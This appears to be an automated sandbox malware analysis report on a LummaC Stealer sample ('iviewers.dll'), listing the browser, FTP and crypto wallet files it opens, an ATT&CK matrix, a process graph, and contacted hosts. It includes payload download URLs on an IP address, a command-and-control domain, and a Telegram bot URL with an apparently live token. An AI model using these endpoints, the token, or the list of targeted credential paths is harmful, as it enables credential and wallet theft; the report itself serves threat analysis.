            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
            Tries to steal Crypto Currency Wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2196, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		111
            Deobfuscate/Decode Files or Information            		2
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts311
            Process Injection            		31
            Obfuscated Files or Information            		LSASS Memory12
            File and Directory Discovery            		Remote Desktop Protocol41
            Data from Local System            		11
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		Logon Script (Windows)Logon Script (Windows)1
            Install Root Certificate            		Security Account Manager33
            System Information Discovery            		SMB/Windows Admin Shares1
            Screen Capture            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts11
            Command and Scripting Interpreter            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS241
            Security Software Discovery            		Distributed Component Object Model2
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell            		Network Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets1
            Process Discovery            		SSHKeylogging124
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials231
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items231
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Regsvr32            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Rundll32            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581496 Sample: iviewers.dll Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 114 api.telegram.org 2->114 116 fivenaii.click 2->116 120 Suricata IDS alerts for network traffic 2->120 122 Found malware configuration 2->122 124 Malicious sample detected (through community Yara rule) 2->124 128 12 other signatures 2->128 12 loaddll32.exe 1 2->12         started        signatures3 126 Uses the Telegram API (likely for C&C communication) 114->126 process4 signatures5 168 Suspicious command line found 12->168 15 cmd.exe 1 12->15         started        18 regsvr32.exe 12->18         started        20 rundll32.exe 12->20         started        22 3 other processes 12->22 process6 signatures7 170 Suspicious powershell command line found 15->170 172 Bypasses PowerShell execution policy 15->172 24 rundll32.exe 15->24         started        174 Suspicious command line found 18->174 27 cmd.exe 18->27         started        29 cmd.exe 1 18->29         started        31 cmd.exe 20->31         started        33 cmd.exe 20->33         started        35 powershell.exe 22->35         started        38 cmd.exe 22->38         started        40 powershell.exe 22->40         started        process8 file9 138 Suspicious command line found 24->138 42 cmd.exe 1 24->42         started        45 cmd.exe 24->45         started        47 powershell.exe 27->47         started        51 2 other processes 27->51 53 2 other processes 29->53 140 Suspicious powershell command line found 31->140 55 3 other processes 31->55 58 2 other processes 33->58 98 C:\Users\user\AppData\Local\...\3vvszjlk.0.cs, Unicode 35->98 dropped 142 Writes to foreign memory regions 35->142 144 Injects a PE file into a foreign processes 35->144 61 3 other processes 35->61 49 curl.exe 1 38->49         started        signatures10 process11 dnsIp12 146 Suspicious powershell command line found 42->146 63 powershell.exe 42->63         started        79 2 other processes 42->79 66 powershell.exe 45->66         started        68 conhost.exe 45->68         started        148 Writes to foreign memory regions 47->148 150 Injects a PE file into a foreign processes 47->150 70 RegAsm.exe 47->70         started        72 csc.exe 3 47->72         started        75 curl.exe 1 51->75         started        152 Suspicious execution chain found 53->152 154 Compiles code for process injection (via .Net compiler) 53->154 100 C:\Users\user\AppData\...\xyq5akbp.cmdline, Unicode 55->100 dropped 156 LummaC encrypted strings found 55->156 81 3 other processes 55->81 118 api.telegram.org 149.154.167.220, 443, 49730, 49731 TELEGRAMRU United Kingdom 58->118 158 Installs new ROOT certificates 58->158 102 C:\Users\user\AppData\Local\...\3vvszjlk.dll, PE32 61->102 dropped 160 Query firmware table information (likely to detect VMs) 61->160 162 Tries to harvest and steal ftp login credentials 61->162 164 Tries to harvest and steal browser information (history, passwords, etc) 61->164 166 Tries to steal Crypto Currency Wallets 61->166 77 cvtres.exe 61->77         started        file13 signatures14 process15 dnsIp16 176 Writes to foreign memory regions 63->176 178 Injects a PE file into a foreign processes 63->178 84 RegAsm.exe 63->84         started        87 csc.exe 5 63->87         started        180 Query firmware table information (likely to detect VMs) 70->180 182 Found many strings related to Crypto-Wallets (likely being stolen) 70->182 184 Tries to steal Crypto Currency Wallets 70->184 106 C:\Users\user\AppData\Local\...\wzlesmvi.dll, PE32 72->106 dropped 90 cvtres.exe 72->90         started        92 curl.exe 1 79->92         started        110 147.45.44.131, 49734, 49735, 49736 FREE-NET-ASFREEnetEU Russian Federation 81->110 112 fivenaii.click 104.21.60.24, 443, 49745, 49746 CLOUDFLARENETUS United States 81->112 108 C:\Users\user\AppData\Local\...\xyq5akbp.dll, PE32 81->108 dropped 94 cvtres.exe 81->94         started        file17 signatures18 process19 file20 130 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 84->130 132 Query firmware table information (likely to detect VMs) 84->132 134 Found many strings related to Crypto-Wallets (likely being stolen) 84->134 136 Tries to steal Crypto Currency Wallets 84->136 104 C:\Users\user\AppData\Local\...\1yj35v5c.dll, PE32 87->104 dropped 96 cvtres.exe 87->96         started        signatures21 process22

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            iviewers.dll47%ReversingLabsWin32.Trojan.Doina

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://147.45.44.131/infopage/pilgm.ps1n0%Avira URL Cloudsafe
            https://fivenaii.click/0%Avira URL Cloudsafe
            https://fivenaii.click:443/api0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps1p0%Avira URL Cloudsafe
            http://crl.microEU0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps1b0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps1l0%Avira URL Cloudsafe
            https://fivenaii.click:443/apiKa0%Avira URL Cloudsafe
            https://fivenaii.click/l0%Avira URL Cloudsafe
            http://crl.microsoftt0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps1X0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps1U0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/p:0%Avira URL Cloudsafe
            https://api.telegram.org00%Avira URL Cloudsafe
            https://fivenaii.click/apip0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/hgfpj.exe0%Avira URL Cloudsafe
            https://fivenaii.click/api0%Avira URL Cloudsafe
            fivenaii.click0%Avira URL Cloudsafe
            https://fivenaii.click/800%Avira URL Cloudsafe
            http://147.45.44.131/infopage/ubvsd.exeq0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps19M0%Avira URL Cloudsafe
            http://crl.microM0%Avira URL Cloudsafe
            https://fivenaii.click/70%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps1(0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/hgfpj.exe0M0%Avira URL Cloudsafe
            https://fivenaii.click:443/apiLSID0%Avira URL Cloudsafe
            https://fivenaii.click/cUC0%Avira URL Cloudsafe
            https://fivenaii.click/40%Avira URL Cloudsafe
            https://fivenaii.click/00%Avira URL Cloudsafe
            https://fivenaii.click/530%Avira URL Cloudsafe
            http://147.45.44.131/infopage/hgfpj.exeL0%Avira URL Cloudsafe
            https://fivenaii.click/apiF0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/hgfpj.exe00%Avira URL Cloudsafe
            http://147.45.44.131/infopage/ubvsd.exe0%Avira URL Cloudsafe
            https://fivenaii.click/Q0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/p0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps10%Avira URL Cloudsafe
            http://147.45.44.131/infopage/pilgm.ps140%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api.telegram.org
            		149.154.167.220
            		truefalse
              		high
              fivenaii.click
              		104.21.60.24
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                slipperyloo.latfalse
                  		high
                  curverpluch.latfalse
                    		high
                    tentabatte.latfalse
                      		high
                      manyrestro.latfalse
                        		high
                        bashfulacid.latfalse
                          		high
                          http://147.45.44.131/infopage/hgfpj.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://fivenaii.click/apitrue
                          • Avira URL Cloud: safe
                          		unknown
                          fivenaii.clicktrue
                          • Avira URL Cloud: safe
                          		unknown
                          wordyfindy.latfalse
                            		high
                            shapestickyr.latfalse
                              		high
                              talkynicer.latfalse
                                		high
                                http://147.45.44.131/infopage/ubvsd.exetrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://147.45.44.131/infopage/pilgm.ps1true
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://147.45.44.131/infopage/pilgm.ps1ncurl.exe, 00000026.00000002.1796222258.0000000003328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://fivenaii.click/RegAsm.exe, RegAsm.exe, 00000031.00000002.2174361705.000000000329C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000031.00000002.2172787217.0000000000D99000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://147.45.44.131/infopage/pilgm.ps1lcurl.exe, 0000001F.00000002.1753219734.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://fivenaii.click:443/apiKaRegAsm.exe, 0000002B.00000002.2110691890.0000000003A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.microEUpowershell.exe, 0000001B.00000002.1953992530.0000000007570000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://147.45.44.131/infopage/pilgm.ps1pcurl.exe, 00000019.00000002.1746361769.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.orgpowershell.exe, 0000000C.00000002.1694181605.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004C9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.0000000004F87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004957000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.microsoftRegAsm.exe, 0000002D.00000002.1868439481.0000000000DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.microsofttpowershell.exe, 0000000D.00000002.1714471562.000000000734F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://fivenaii.click:443/apiRegAsm.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://147.45.44.131/infopage/pilgm.ps1bcurl.exe, 00000026.00000002.1796222258.0000000003328000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://fivenaii.click/lRegAsm.exe, 00000031.00000002.2174361705.000000000329C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://147.45.44.131/infopage/pilgm.ps1Ucurl.exe, 0000001F.00000002.1753219734.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://147.45.44.131/infopage/pilgm.ps1Xcurl.exe, 0000001F.00000002.1753219734.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://147.45.44.131/infopage/p:curl.exe, 0000001E.00000002.1745016542.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://fivenaii.click/apipRegAsm.exe, 0000002D.00000002.1866051496.0000000000D90000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=76540iviewers.dllfalse
                                          		high
                                          https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.1694181605.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1694150794.0000000004A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1694125670.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1718935125.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1835577839.0000000004631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861999388.0000000004F8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1831061949.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1915834227.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.verispowershell.exe, 00000018.00000002.1829917121.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/bot7453569667:aaexd9axbzzcee5q99ndzg6kmwdokbksvlu/sendmessage?chat_id=76540powershell.exe, 0000000E.00000002.1693280783.0000000003110000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1772070677.0000000006E61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000025.00000002.1978905072.00000000061FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
